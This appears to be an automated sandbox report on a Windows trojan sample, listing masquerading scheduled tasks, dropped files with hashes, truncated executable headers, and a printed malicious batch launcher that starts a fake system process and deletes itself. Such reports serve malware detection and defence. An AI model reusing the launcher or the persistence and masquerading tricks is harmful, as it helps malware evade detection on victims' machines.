            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@43/33@0/0
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): Conhost.exe, services.exe, dllhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target comProviderServer.exe, PID 7800 because it is empty
            • Not all processes were analyzed; report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: file.exe
            Time | Type | Description
            01:01:13 | Task Scheduler | Run new task: services path: "C:\Program Files\Windows Defender Advanced Threat Protection\services.exe"
            01:01:13 | Task Scheduler | Run new task: servicess path: "C:\Program Files\Windows Defender Advanced Threat Protection\services.exe"
            01:01:13 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Program Files\Windows Sidebar\WmiPrvSE.exe"
            01:01:13 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Program Files\Windows Sidebar\WmiPrvSE.exe"
            01:01:15 | Task Scheduler | Run new task: bdoMPjmZJHMIJMdqEctkzcHPTiy path: "C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe"
            01:01:15 | Task Scheduler | Run new task: bdoMPjmZJHMIJMdqEctkzcHPTiyb path: "C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe"
            01:01:15 | Task Scheduler | Run new task: explorer path: "C:\Users\Public\Downloads\explorer.exe"
            01:01:16 | Task Scheduler | Run new task: explorere path: "C:\Users\Public\Downloads\explorer.exe"
            01:01:16 | Task Scheduler | Run new task: spoolsv path: "C:\reviewDriverIntosessionnet\spoolsv.exe"
            01:01:16 | Task Scheduler | Run new task: spoolsvs path: "C:\reviewDriverIntosessionnet\spoolsv.exe"
            01:01:16 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"
            01:01:16 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"
            01:01:18 | Task Scheduler | Run new task: wscript path: "C:\Users\user\wscript.exe"
            01:01:18 | Task Scheduler | Run new task: wscriptw path: "C:\Users\user\wscript.exe"
            No context
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (785), with no line terminators
            Category:dropped
            Size (bytes):785
            Entropy (8bit):5.911093002342794
            Encrypted:false
            SSDEEP:24:pjO5hN5wKhCASJVJlV+4hB30ccrWYq5qns:ShThIJVBrQMus
            MD5:A4CFE8AE9DD1EE4890DEDD07CDD17598
            SHA1:D89D172CB4A847917278E86EA28C502AFA136AE1
            SHA-256:DFB9BE4756FB79F4E89FF7EF195156CB8E6C6F16913BAFB9A9DDD1EEF4D6F927
            SHA-512:DD3AED36B895831465814A3B5C4448A637EB4BE3524D3364E0243B5762EECD3723D43F07E3FDB72DA23307AEF874022F8D445C2F545DA71F4027FAE9E057B283
            Malicious:false
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (849), with no line terminators
            Category:dropped
            Size (bytes):849
            Entropy (8bit):5.887620635318584
            Encrypted:false
            SSDEEP:12:xrRDFoMfsggLrVstHSd0tWZ4NvBScF5mur2eV7NWVbUzhPbPKEgSz2nnnn:bD2MfZgLrYHSd0tI65viHhUxxgSz2n
            MD5:2BCBB6F8B83F66AD1936E8A71CAF94E2
            SHA1:385B81599E10F841FBEB76030D3D85CDFDEF7650
            SHA-256:827062C1A21107514E2DABDD4A24BB4E789BF645EB66EA699EB8F0606C0F7159
            SHA-512:610EC31B7FC52983CA0ECEA8C9A920CC1C07EDCFC05B9B2097904B18CC72E1E04492A37E3FC9EDDA707E9D64789F97C1E73139CEC9F3D963A4A2A8B85E550693
            Malicious:false
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (468), with no line terminators
            Category:dropped
            Size (bytes):468
            Entropy (8bit):5.849524438303441
            Encrypted:false
            SSDEEP:12:9SCB9VhjZ9YvM2dC848zixxXT8dPQBxzlGej3V:97B9LjZ9YU2f48zixxDZDlGeZ
            MD5:9C29471513CA017110AF3860CAC716DF
            SHA1:19A976FCFCFE7EBFB25A412031955FD91D40AC87
            SHA-256:5FAA76F6D90391105755490B7CE29819CAB7A0180C38D3F29F226A3E66A367D8
            SHA-512:DCAEAD1BB72B5A9D8452DFD869A04BE4829A323E0F06BC18CE5BE3683D4DB927EA660C6D14D8C429AC3735FF4868AD76567B5E0DF2B64A67E1348A0C96D559E3
            Malicious:false
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (782), with no line terminators
            Category:dropped
            Size (bytes):782
            Entropy (8bit):5.885454318039116
            Encrypted:false
            SSDEEP:12:2JtADLUvBT9xgKRL+++JXykOViijMEIkR3KLG5DNXf/CraVEJsWoG4yWxJ9NBw83:RDL2BwKReCri8p6q1NX3CrF9s9XbXr
            MD5:4B70671D63098F5FE066D32D4FBD6167
            SHA1:51F0FE23049814E58DDA21A31643BCB1A98ACAC0
            SHA-256:787CBF854535030C0902EB5C83413BF2F45B82EC736B42868744285C9B2A2A16
            SHA-512:A140FAFFDCDCBA3BF37D0B793D722180290C72593E5C6C99204EE5F581809DBE8AE4BE4D7417E1057900E12D23238CE8035AD9E425065C5FC3E012741DE46C85
            Malicious:false
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):201
            Entropy (8bit):5.706431159694625
            Encrypted:false
            SSDEEP:6:WYPIda0fGPKRlvvNDLRSt/pot40Um6QC/lBi1brQzBv:vPIdFBplStqUXQmlBi1brQzBv
            MD5:D11FA06CEEDA5A06C782290C522E5E17
            SHA1:ABE7E3F29600916D385F83714033BF4B6C9846B8
            SHA-256:99D68D4565D727A638A0F090AAD57564D2D0C74B6F200F9B85CAC4E5A6563B41
            SHA-512:56814ECBAAF2A39D439747855FF84366AECAFA74D450DF2DE14DD60C0DED923A872A0DB37443C29DAF5BC87C89412F6E0A5BBCA2497C16DE483FD6A2C25281B5
            Malicious:false
            Preview:NdYkDRjy3k2n86x60kJshI2SzkIEOtwpJIzBc47X4UsJ24qYKElj4JoFkFudIfjKyMe0Hvd5mvxNZta53u4KHNvAetbWKeOZviVpa0RZkp7IVbp0pykYlZCkbeWXTGvIhYb1YufDcfjcQnoDDlrV4zyWfuO5d3Fd4yl79yb4Tg6FzkUx0TUsZaOrjFWogjjjaGhbCqDPJ
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (831), with no line terminators
            Category:dropped
            Size (bytes):831
            Entropy (8bit):5.907535247871906
            Encrypted:false
            SSDEEP:12:E1E/jy2xf9pK4hRKQuOvtvZe0vAEuXTC5gtKQlIiTkaLBwuGLI+gk7yvPOICAqW5:EWLf9kU9uORY0vA7C6KSlOwxyI3F
            MD5:63E89DFB9D96B8120250DD232A0350C0
            SHA1:5470640004F1DB7A7281E5D144C599976849C732
            SHA-256:A0B4625A78448E34B911F793B7AEDDC83E9FAB68F35844099BCE2CBF9C8F3356
            SHA-512:C096A6D1C6A0EE5C497715A3BA2CECFD8C5BD557279FA3D06BD9636C92EC1C90AF978DFA109AC13ADC2628B6C4CA8178B7972345DF56937308FAD7BDD21843D2
            Malicious:false
            Preview:
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (786), with no line terminators
            Category:dropped
            Size (bytes):786
            Entropy (8bit):5.91545973380718
            Encrypted:false
            SSDEEP:12:GWVypSd3IiILy6U+nx91OdQYVQqkq5EAvAaWjM/5YOsg55d90mBo0gAUc+oIMcmT:GWysCg6fx91OXVSqPvRJbxNvUmrQw
            MD5:44ABA634FFF0DA65387AA0228C97ADEC
            SHA1:B17BAC9EAD6F16F7E751BE62FFE134F8D79F0790
            SHA-256:BF1928D828DB16B365AF4150941626886BE01C6E7D43D4CDF59C807272D839DD
            SHA-512:0727D8B8B961C4213FEBC28F0C70590BB84090BCC8AD1BF1CE75AD2DD3476AA2279A4E54195187437A1C84731E0564D74156147F0F9A80E2B5F92F7F54DC6C9A
            Malicious:false
            Preview:
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):100
            Entropy (8bit):5.539819909835649
            Encrypted:false
            SSDEEP:3:HRHS809VheKEYZkhDoGdBd1Fv21MyzL6Z43hm1w:xy88bBkhDFdr1Fv21MyA6ow
            MD5:5938D19E7E6CD6BA63DCE0FB419771D9
            SHA1:00979271DFEA68A5DA2FCB8AABADE83C14BBC849
            SHA-256:D3CDD06D6FB8AB72286408470CF0193540E8EADD303473C0ADC2DC0379C26E58
            SHA-512:D265D40C6E59D4CDF8A76B7C46E0C2504615DF4E6D01ACDACEFE994BEF487567B70F14D3356DB3AB2CA7A8F07E28A0CB91C99891108B6A57E8435C4A9A1CF6C8
            Malicious:false
            Preview:KiWEek3Y4bwYt7XpsC2vJPEimX0y0haOFeYADBD0IRJxXZSZgCy2ho55dxcGtFhWBiSPiWmq8Bn1FRLMFbRxthraidgQj7HDuxwy
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):251
            Entropy (8bit):5.761053868364122
            Encrypted:false
            SSDEEP:6:fCLoLRWi36sBDgmHyn8d9yxZ+MWBCs5mqQKenndK:fCMAW6siwyn8dAsM+VQpndK
            MD5:B0784C712E0DB4169E61C73E150D5760
            SHA1:83C11AB0D793A15E03C998EDD965954362433F67
            SHA-256:4E9146A4C5B65CD58ADDD67D6F7A9564A7CB759CA702A9061687A5D530949DA1
            SHA-512:6C2BE36100337039F8C351E3A17B662EDD602E218F804982392254761F55EBB0A412FEA72A725994677C88B461FC3AAC85B4089A85D3F29D4E233F2337B59BAE
            Malicious:false
            Preview:wn27ZLdutAkKxguic3la1guwu7rVLtT8aFEAjeOcNzdM28u3ouvxkLXP3GNcdHiArmurbu98pINBCh3vMyra8fYOszGcQw9FQdfPOCb4vwIc8VMWMbPoaICLOg9mngr2IIvjBohJXxpLX5PWmuQzhUoIbUBsDyQOFPTzknVi3FRnc0xSQmA3Q1VxdmHqnyGjgbFImaw8Zr5bDApkhscbxW7O3gW7fo5F9sHBvoq00Bei54uc7hJ4WpvJd1O
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1915
            Entropy (8bit):5.363869398054153
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
            MD5:E6E3A2B5063C33228E2749DC291A1D3D
            SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
            SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
            SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.213660689688185
            Encrypted:false
            SSDEEP:3:zSMSjdgmSoSMRn:ZigloSQn
            MD5:4F1E3BAEC0E1C6AD2009F1E1B6D60B01
            SHA1:653C023086FD859727C11BF57ABCCDAF3C75AE54
            SHA-256:1AA2DD35E51EEB74A1470DEB25729E6CCD37DBFF721DE3322BD9ADA709D6BF78
            SHA-512:D9EDEA9D8C9D121BAAF755F6A486DA63FB290BF4079C64C9DA7FF8372C5BE1282ECECAEDBFBA16674296FA1AFB1A32A61F27382B30FD6AF9A045089622CB71FB
            Malicious:false
            Preview:mkw2YS9w3A8eAsU67i4akwBit
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):216
            Entropy (8bit):5.173550804439114
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DERuVzWKOZG1cNwi23fY8Mxr:OTg9YDEIVLZg8C
            MD5:3BBBF5E84D1083D4FA6762546A4C6D0E
            SHA1:E0575929B630BE01BA0798AC8005C133B677F755
            SHA-256:84D3596770CA2FE9A4C53947C5EFE23721F5D713B5585E9BEAE9EF58B5EC3C8C
            SHA-512:2B0CD1ACB5A43A63D3B0C1702EDC8ABD0A1DDEE93C200334D312A82DBB483AB6418B8040C9201750E9261B6AB111A5ECDD0232D1D8922B7E44B6E767A691AE5C
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vEbYiTsQ2u.bat"
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (338), with no line terminators
            Category:dropped
            Size (bytes):338
            Entropy (8bit):5.81681059859829
            Encrypted:false
            SSDEEP:6:vuORkCeQGMn+tMI2UoXLGtsL8RJbGCoCFmNZtVp6N1fVRH4hu3NNFVuEcVogJw5o:WRGLxXLPL8R1bZmBOhzHb3NLVu6g+S
            MD5:94EAAF1B3E03C46EB5E6B194E26F7796
            SHA1:9B61EB51C3022BD44C1BADE6B46B1BEFFAB29908
            SHA-256:74A182E0BBAA1C1EB907954A739319B72DA87B7C5DDD0A9BC690D970D5C2FACB
            SHA-512:D312303806F46146030E1F6657AEBCF996A73FEF3FD0AF2D83365E5A62CDE350C75A1F22D5F616035DAECCAB5E22EAF2985F2A0069D2C1C27884998153A2A707
            Malicious:false
            Preview:BfIYhiHOrae4GpkutkFHYgMZxM9idTpPrYaGAciQf6Ccf13Vq7qFmb5eSslVijuYvPNrOdtQCzmcdu35Tn1fmjmPc5xS1Mr5LoqQnLGMOZDxzdAizqC5sPvLm8PSqbZzIrQzDnRHhoRNgza85OcLKwN62fop6xgw9OoINLfLY4YD8iowhQXb8OoWdT6i8lLtIeNSLSvttRwPXJ7U02HpZFyvjSo3O6Nxto5eVWkPforrbZ8UVmsGdfTDpbt3o1exD9gtOd8dR2KvXHUKTThmOGTNU1y3nrknJ4nc2OF2nOykUipiHjjUT2i6pSYWpF0jRgmdd1RENp9ASs2wMP
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (470), with no line terminators
            Category:dropped
            Size (bytes):470
            Entropy (8bit):5.864916497717177
            Encrypted:false
            SSDEEP:12:yvqVsFd7iR6KjzH22KbUrNA/r7qfk1MpPfV0UBMvtrbFAJRK8Zw0gFBf+w:ySVsn7IDjzH22KbUrNAr7qcCMvtip1cz
            MD5:5FBF29E4EF400E0EF6D213D4598BEC6D
            SHA1:F296003BF344C4E1C7B5D0DF8BB70E5FCCD19C90
            SHA-256:CD1B17C1C5B1D5A0443E00CF85EBB2C684CFF432D6C83B86DE38C480BC5075B6
            SHA-512:641F10C275DD695686353DB949EC5D19C78B2C0492C74A30763F90273FFE3C57A2E3FF64BD61C3523B58700FB1452762D4688C812C8640934BA0CEFE60FC524B
            Malicious:false
            Preview:LZqnC94fhyTqYFMia6w90FRO14Ludz0paA9hlKxZuwZKvJB6yYcVbHmFHbvIyJBr8nQYGo7PJWOEqHds3P5FWeNSY3aJZpllvrLH2n0KaMME3iZA8DOjN5Uda8AMOx0dvnS85VzPYvoJRIZzdaLWaCXzWrr4nn5mWsTQPaEmN8KcQKMRjKsyldDtPcmNn5mvzBxjzIkDViIb15jLfZUc4HB3pjAwy09RWZmOXncakpcCUl1U3asNkK0sA43PIxOfj1FcSUx2742Pp8iDrp2XIvrMi3NdtMRwa7cdfZBjm0QqRkDCVzhd40XyJ33YGUIvmGyrfEiSnTvSfB480LI3oy1jkoUmfmcSreDLwVhQRPzlFETI95i5MOHyOPH1u5wA0ckA8tLfn1mZ8PdfULnkEhGcXP6hOpgVczumeSKPtDRUmsz9vlgiSM5TWHnsxoQ8UQ6Je1BBBX1BPvzpZ6vmI7
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
